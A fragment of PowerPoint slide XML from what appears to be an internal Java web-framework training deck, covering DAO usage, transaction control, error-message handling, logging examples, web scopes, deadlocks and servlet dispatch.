            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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/>
              <a:t>getConnName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ("DS_", null, Platform.NA);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9" y="3899774"/>
            <a:ext cx="6681603" cy="33480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55" y="4276627"/>
            <a:ext cx="7744248" cy="30569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91" y="4999935"/>
            <a:ext cx="10015140" cy="39303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354" y="4575959"/>
            <a:ext cx="10306277" cy="3930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79" y="5399777"/>
            <a:ext cx="6536039" cy="3639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71532" y="4199877"/>
            <a:ext cx="337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com.cathaybk.xx.dao.XX_CARS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596006" y="4566786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xx.dao.XX_CARS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02576" y="495508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610094" y="5390569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DS_XX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5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交易控制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Transaction.begin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488831"/>
            <a:ext cx="3695700" cy="1066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118738"/>
            <a:ext cx="7029450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527949"/>
            <a:ext cx="7629525" cy="695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328743"/>
            <a:ext cx="3284112" cy="6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2488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checkCompanyPage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33500" y="1105189"/>
            <a:ext cx="10515600" cy="259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46</a:t>
            </a:fld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540327" y="578992"/>
            <a:ext cx="8783782" cy="6239659"/>
            <a:chOff x="0" y="1290709"/>
            <a:chExt cx="11849100" cy="841714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90709"/>
              <a:ext cx="11849100" cy="320538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644" y="4274560"/>
              <a:ext cx="7839075" cy="18002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155026"/>
              <a:ext cx="7372350" cy="3552825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1165623" y="1405115"/>
            <a:ext cx="240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com.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cathaybk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>com.test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957" y="1374052"/>
            <a:ext cx="6103504" cy="3483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6610635" y="2650990"/>
            <a:ext cx="260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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>com.cathaybk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>com.test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20302" y="333553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依依判斷起始是否為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endCxn id="22" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6308436" y="3020322"/>
            <a:ext cx="1603325" cy="315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26297" y="4704420"/>
            <a:ext cx="51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Class package location error, the class should under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</a:rPr>
              <a:t>com.cathaybk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>com.test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>folder.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867" y="6514165"/>
            <a:ext cx="1224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basement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484957" y="449500"/>
            <a:ext cx="567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searchedCaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>com.test.basement.testTransactionN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DA09-7FA0-4886-B75B-BB000B8A9984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catch finally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56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eBAF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410" y="2206077"/>
            <a:ext cx="2133600" cy="311727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3010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zh-TW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86019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619" y="2206077"/>
            <a:ext cx="4423063" cy="311727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0954" y="230839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3352575" y="3273943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6074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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TxBean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981" y="2206077"/>
            <a:ext cx="4132345" cy="3117273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="81C8E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85582" y="2308397"/>
            <a:ext cx="1482437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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="32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8134700" y="3425247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10052513" y="2746313"/>
            <a:ext cx="1557596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Module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0135120" y="403483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Dao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9241559" y="5609808"/>
            <a:ext cx="1325187" cy="1325187"/>
            <a:chOff x="9241559" y="5457479"/>
            <a:chExt cx="1325187" cy="1325187"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1026" name="Picture 2" descr="「databas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1559" y="5457479"/>
              <a:ext cx="1325187" cy="132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9628275" y="5457479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DB</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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2178401" y="3528291"/>
            <a:ext cx="1174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61483" y="3616037"/>
            <a:ext cx="245917" cy="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99782" y="3616037"/>
            <a:ext cx="11349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051636" y="2899435"/>
            <a:ext cx="1000877" cy="5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2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10831311" y="3425247"/>
            <a:ext cx="0" cy="609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2178401" y="3953184"/>
            <a:ext cx="1169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361483" y="3953184"/>
            <a:ext cx="245917" cy="9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999782" y="3962749"/>
            <a:ext cx="113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9411855" y="3103028"/>
            <a:ext cx="640658" cy="32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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9628275" y="5323350"/>
            <a:ext cx="0" cy="3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0181585" y="5298657"/>
            <a:ext cx="0" cy="36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527082" y="3906628"/>
            <a:ext cx="608038" cy="29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 flipV="1">
            <a:off x="9411855" y="4118605"/>
            <a:ext cx="722516" cy="37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6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rootException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XX_CARS.query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>() &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>VOTool.findToMaps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>searchAndRetrieve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7649"/>
            <a:ext cx="10429875" cy="165735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393755" y="1944893"/>
            <a:ext cx="20540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771442" y="2981739"/>
            <a:ext cx="5517254" cy="3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92" y="821532"/>
            <a:ext cx="3324225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866" y="4001294"/>
            <a:ext cx="3228975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866" y="4773301"/>
            <a:ext cx="378142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8503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MessageUtil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ReturnMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>msg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returnCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>msgID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MessageUtil.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>setReturnMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>ReturnCode.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1"/>
              <a:t>ERROR_INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dnfe.getMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1"/>
              <a:t>ReturnMessage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msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Throwable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> t, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RequestContext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req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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1"/>
              <a:t>returnCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>, String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1"/>
              <a:t>msgID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>MessageUtil.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>setReturnMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>dnfe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>ReturnCode.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1"/>
              <a:t>DATA_NOT_FOUND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dnfe.getMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>());</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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7806"/>
            <a:ext cx="4067175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268" y="4704557"/>
            <a:ext cx="4019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1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85788"/>
            <a:ext cx="11601450" cy="27800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500796"/>
            <a:ext cx="6486525" cy="23622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81817" y="4312564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XXT00200_20171221_C1A7BD443E_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57416" y="38531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資料庫存取有誤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811739" y="322115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XXT0_0200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278" y="2171086"/>
            <a:ext cx="4457700" cy="17335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240" y="4539031"/>
            <a:ext cx="3533775" cy="1438275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="直線單箭頭接點 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10550128" y="3904636"/>
            <a:ext cx="0" cy="634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71" y="5717194"/>
            <a:ext cx="6374607" cy="2916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32584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/>
              <a:t>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b="1" i="1" dirty="0" err="1"/>
              <a:t>LOG.error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1"/>
              <a:t>dnfe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>2017-12-21 13:22:20,788 [ERROR][XXT0_0200.doQuery()(69)] - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1"/>
              <a:t>com.cathay.common.exception.DataNotFoundException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>: XX_CARS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>查無資料</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>代號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>:com.cathaybk.xx.dao.XX_CARS.SQL_QUERY_001</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>LOG.error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1"/>
              <a:t>errTestMsg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1"/>
              <a:t>dnfe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>2017-12-21 13:39:14,157 [ERROR][XXT0_0200.doQuery()(70)] - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>errTestMsg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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b="1" i="1" dirty="0" err="1"/>
              <a:t>com.cathay.common.exception.DataNotFoundException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>: XX_CARS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>查無資料</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>代號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0"/>
              <a:t>:com.cathaybk.xx.dao.XX_CARS.SQL_QUERY_001</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i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65125"/>
            <a:ext cx="7943850" cy="99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45" y="4951413"/>
            <a:ext cx="7716159" cy="17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0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64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Page: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只存在這個頁面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Request:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 存在一次傳遞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Session:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 使用者使用期間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儲存個人資料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Appliaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: web container(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ex.eBAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>啟動到結束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1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死結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多個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需要資源時就有可能發生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預防方法：破壞其中一個條件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隨機結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>束</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一條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，釋放資源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B89-B043-42C3-87F2-3B7C69D45B7A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114621" y="2495504"/>
            <a:ext cx="1969476" cy="9879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9531" y="3153077"/>
            <a:ext cx="1125415" cy="1105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/>
              <a:t>TableA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://www.iconexperience.com/_img/g_collection_png/standard/256x256/lock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39" y="3890379"/>
            <a:ext cx="736146" cy="7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5783498" y="2495504"/>
            <a:ext cx="1969476" cy="987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45296" y="3153077"/>
            <a:ext cx="1125415" cy="1105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/>
              <a:t>TableB</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2" descr="https://www.iconexperience.com/_img/g_collection_png/standard/256x256/lock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857" y="3890379"/>
            <a:ext cx="736146" cy="7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/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2608385" y="2989467"/>
            <a:ext cx="3175113" cy="94469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058326" y="3890379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TableA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084098" y="2989465"/>
            <a:ext cx="2850102" cy="9815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159429" y="3930714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err="1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TableB</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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76193" y="213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阿明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84164" y="2804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阿美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51659" y="21198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小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>王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493797" y="3468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小花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4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/>
              <a:t>Servlet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16482" y="3931117"/>
            <a:ext cx="4581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{DEMOA0_0110=com.cathaybk.demo.a0.trx.DEMOA0_0110, DEMOA0_0100=com.cathaybk.demo.a0.trx.DEMOA0_0100, MEPST0_0200=com.cathaybk.meps.t0.trx.MEPST0_0200, XXT0_0300=com.cathaybk.xx.t0.trx.XXT0_0300, MEPST0_0300=com.cathaybk.meps.t0.trx.MEPST0_0300, XXT0_0200=com.cathaybk.xx.t0.trx.XXT0_0200, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>SysNews_BK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>com.cathaybk.common.trx.SysNews_BK</a:t>
            </a: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28656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545" y="2333801"/>
            <a:ext cx="1763910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Web.xml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66904" y="2867358"/>
            <a:ext cx="2566782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Log4jAwareDispatcher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6500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00389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Log4jAwareDispatcher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834748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BeanProxy.init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(true)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4344" y="2303621"/>
            <a:ext cx="3581955" cy="13942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68233" y="2486201"/>
            <a:ext cx="3678066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BeanProxy</a:t>
            </a:r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zh-TW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902592" y="2867358"/>
            <a:ext cx="2705178" cy="436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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m_namingMappings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2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9807349" y="3303740"/>
            <a:ext cx="447832" cy="62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4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Ajax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293474" y="2300214"/>
            <a:ext cx="2133600" cy="2904548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4664083" y="3306659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燕尾形向右箭號 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6427074" y="3070557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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url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?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波浪 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4293474" y="4443844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0274" y="1346418"/>
            <a:ext cx="3154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/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>XXWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>/servlet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>HttpDispatcher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4908"/>
            <a:ext cx="8358515" cy="300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直線單箭頭接點 14"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5143985" y="1715750"/>
            <a:ext cx="1793676" cy="24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838200" y="2844824"/>
            <a:ext cx="10178436" cy="714283"/>
            <a:chOff x="838200" y="2844824"/>
            <a:chExt cx="10178436" cy="71428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249" y="2844824"/>
              <a:ext cx="4286736" cy="354658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224544"/>
              <a:ext cx="10178436" cy="334563"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="81C8EB"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直線單箭頭接點 20"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6937661" y="1715750"/>
            <a:ext cx="1516663" cy="153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274" y="432790"/>
            <a:ext cx="6599879" cy="58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04" y="3881158"/>
            <a:ext cx="6302657" cy="281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04" y="4226408"/>
            <a:ext cx="7683840" cy="91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04" y="5289835"/>
            <a:ext cx="7179234" cy="324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204" y="5831576"/>
            <a:ext cx="7635134" cy="480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328" y="5634391"/>
            <a:ext cx="3299370" cy="368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4953" y="4797294"/>
            <a:ext cx="4186709" cy="636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953" y="3597156"/>
            <a:ext cx="8338873" cy="1080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7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3" grpId="0" animBg="1"/>
      <p:bldP spid="1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4435" y="125591"/>
            <a:ext cx="2133600" cy="2859593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCB6D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595044" y="1087081"/>
            <a:ext cx="1392382" cy="678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JSP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燕尾形向右箭號 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358035" y="850979"/>
            <a:ext cx="2574472" cy="1144161"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36680"/>
              <a:gd name="adj2" fmla="val 51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Request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url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波浪 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224435" y="2224266"/>
            <a:ext cx="2133600" cy="760918"/>
          </a:xfrm>
          <a:prstGeom prst="wav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Client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932508" y="125591"/>
            <a:ext cx="2854778" cy="2859593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
